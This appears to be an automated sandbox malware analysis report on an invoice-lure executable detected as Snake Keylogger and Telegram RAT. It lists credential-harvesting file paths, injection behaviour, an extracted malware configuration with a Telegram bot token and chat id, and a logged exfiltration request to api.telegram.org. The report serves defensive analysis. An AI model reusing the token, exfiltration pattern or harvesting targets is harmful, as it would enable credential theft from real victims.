Code function: 0_2_6FF41B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FF41B63

Enables debug privileges

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Process created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403359

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
142.250.185.174	drive.google.com	United States	15169	GOOGLEUS	false
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
172.217.16.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
drive.google.com	142.250.185.174	true
drive.usercontent.google.com	172.217.16.193	true
reallyfreegeoip.org	188.114.97.3	true
api.telegram.org	149.154.167.220	true
checkip.dyndns.com	193.122.6.168	true
checkip.dyndns.org	unknown	unknown

Contacted URLs

Name	Malicious	Reputation
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2019/11/2024%20/%2002:39:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://reallyfreegeoip.org/xml/155.94.241.187	false	high

AV Detection

Found malware configuration

Source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7807279596:AAEZM1QwkCh738-y0Qmnc3ubaoLMl6bUCVw", "Chat_id": "7267131103", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: Factura Honorarios 2024-11-17.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_391787A8 CryptUnprotectData,		3_2_391787A8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39178EF1 CryptUnprotectData,		3_2_39178EF1

Uses 32bit PE files

Source: Factura Honorarios 2024-11-17.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2

Source: Factura Honorarios 2024-11-17.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_004065C7 FindFirstFileW,FindClose,	0_2_004065C7
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405996
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00402868 FindFirstFileW,	3_2_00402868
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_004065C7 FindFirstFileW,FindClose,	3_2_004065C7
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_00405996

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 0015F45Dh	3_2_0015F2C0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 0015F45Dh	3_2_0015F4AC
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 0015F45Dh	3_2_0015F52F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 0015FC19h	3_2_0015F974
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F831E0h	3_2_38F82DC8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F82C19h	3_2_38F82968
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8E501h	3_2_38F8E258
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8D3A1h	3_2_38F8D0F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8CF49h	3_2_38F8CCA0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_38F80040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8FAB9h	3_2_38F8F810
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F831E0h	3_2_38F82DC4
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8DC51h	3_2_38F8D9A8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8D7F9h	3_2_38F8D550
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F831E0h	3_2_38F8310E
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8E959h	3_2_38F8E6B0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8E0A9h	3_2_38F8DE00
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8F661h	3_2_38F8F3B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8F209h	3_2_38F8EF60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F80D0Dh	3_2_38F80B30
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F81697h	3_2_38F80B30
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 38F8EDB1h	3_2_38F8EB08
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391779C9h	3_2_39177720
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39177EB5h	3_2_39177B78
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39179280h	3_2_39178FB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917C826h	3_2_3917C558
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917E816h	3_2_3917E548
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39170FF1h	3_2_39170D48
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39171449h	3_2_391711A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917ECA6h	3_2_3917E9D8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391718A1h	3_2_391715F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917CCB6h	3_2_3917C9E8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391762D9h	3_2_39176030
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917BF06h	3_2_3917BC38
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917DEF6h	3_2_3917DC28
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391702E9h	3_2_39170040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39173709h	3_2_39173460
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39170741h	3_2_39170498
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then mov esp, ebp	3_2_3917B081
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391732B1h	3_2_3917308F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39176733h	3_2_39176488
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917E386h	3_2_3917E0B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917C396h	3_2_3917C0C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39170B99h	3_2_391708F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917B5E6h	3_2_3917B318
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391725A9h	3_2_39172300
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917D5D6h	3_2_3917D308
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391755D1h	3_2_39175328
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39172A01h	3_2_39172758
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917DA66h	3_2_3917D798
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39175A29h	3_2_39175780
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917FA56h	3_2_3917F788
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39172E59h	3_2_39172BB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917BA76h	3_2_3917B7A8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39175E81h	3_2_39175BD8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39176CC1h	3_2_39176A18
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391748C9h	3_2_39174620
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39171CF9h	3_2_39171A50
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39177119h	3_2_39176E70
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917D146h	3_2_3917CE78
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39174D21h	3_2_39174A78
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917F136h	3_2_3917EE68
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39172151h	3_2_39171EA8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39175179h	3_2_39174ED0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39177571h	3_2_391772C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 3917F5C6h	3_2_3917F2F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E6970h	3_2_391E6678
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E1E47h	3_2_391E1BA0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E6347h	3_2_391E5FD8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391ECDD8h	3_2_391ECAE0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E2BE6h	3_2_391E2918
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EC910h	3_2_391EC618
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E19DEh	3_2_391E1710
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E9E08h	3_2_391E9B10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E4BD7h	3_2_391E4908
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E7300h	3_2_391E7008
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EE0F8h	3_2_391EDE00
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E3506h	3_2_391E3238
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EDC30h	3_2_391ED938
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EB128h	3_2_391EAE30
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E54F6h	3_2_391E5228
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E8620h	3_2_391E8328
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EF418h	3_2_391EF120
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E3E26h	3_2_391E3B58
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EEF50h	3_2_391EEC58
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EC448h	3_2_391EC150
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E5E16h	3_2_391E5B48
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E9940h	3_2_391E9648
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E030Eh	3_2_391E0040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E6E38h	3_2_391E6B40
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E4746h	3_2_391E4478
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391ED768h	3_2_391ED470
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EAC60h	3_2_391EA968
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E0C2Eh	3_2_391E0960
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E8158h	3_2_391E7E60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E5066h	3_2_391E4D98
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E7C90h	3_2_391E7998
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EEA88h	3_2_391EE790
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E2756h	3_2_391E2488
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EBF80h	3_2_391EBC88
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E154Eh	3_2_391E1280
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E9478h	3_2_391E9180
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E5986h	3_2_391E56B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E8FB0h	3_2_391E8CB8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EFDA8h	3_2_391EFAB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E3076h	3_2_391E2DA8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391ED2A0h	3_2_391ECFA8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EA798h	3_2_391EA4A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EA2D0h	3_2_391E9FD8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E079Eh	3_2_391E04D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E77C8h	3_2_391E74D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E3996h	3_2_391E36C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EE5C0h	3_2_391EE2C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EBAB8h	3_2_391EB7C0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E22C6h	3_2_391E1FF8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EB5F0h	3_2_391EB2F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E10BEh	3_2_391E0DF0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E8AE8h	3_2_391E87F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391E42B6h	3_2_391E3FE8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 391EF8E0h	3_2_391EF5E8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39211FE8h	3_2_39211CF0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39210801h	3_2_39210508
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39211658h	3_2_39211360
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39210CC8h	3_2_392109D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39211B20h	3_2_39211828
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39210338h	3_2_39210040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then jmp 39211190h	3_2_39210E98
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_39393E70
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_39393E60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_393909E1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_39390A10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_39390D26

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2019/11/2024%20/%2002:39:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
